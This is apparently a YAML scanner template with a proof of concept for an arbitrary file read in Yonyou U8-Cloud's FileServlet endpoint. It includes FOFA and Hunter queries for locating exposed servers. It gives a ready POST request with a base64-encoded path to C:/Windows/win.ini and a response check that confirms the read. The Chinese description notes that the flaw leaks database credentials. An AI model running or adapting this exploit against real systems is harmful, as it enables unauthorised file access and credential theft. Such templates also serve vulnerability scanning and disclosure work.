product: 用友U8-Cloud
vName: 用友U8-Cloud FileServlet 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 用友U8-Cloud /servlet/nc.bs.hr.tools.trans.FileServlet 任意文件读取漏洞，泄露数据库账号及密码等敏感信息。
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
  Hunter: app.name="用友 U8 Cloud"
protocol: http
link: https://blog.csdn.net/qq_40550150/article/details/137049448
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /servlet/nc.bs.hr.tools.trans.FileServlet
      data: path=QzovV2luZG93cy93aW4uaW5p
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and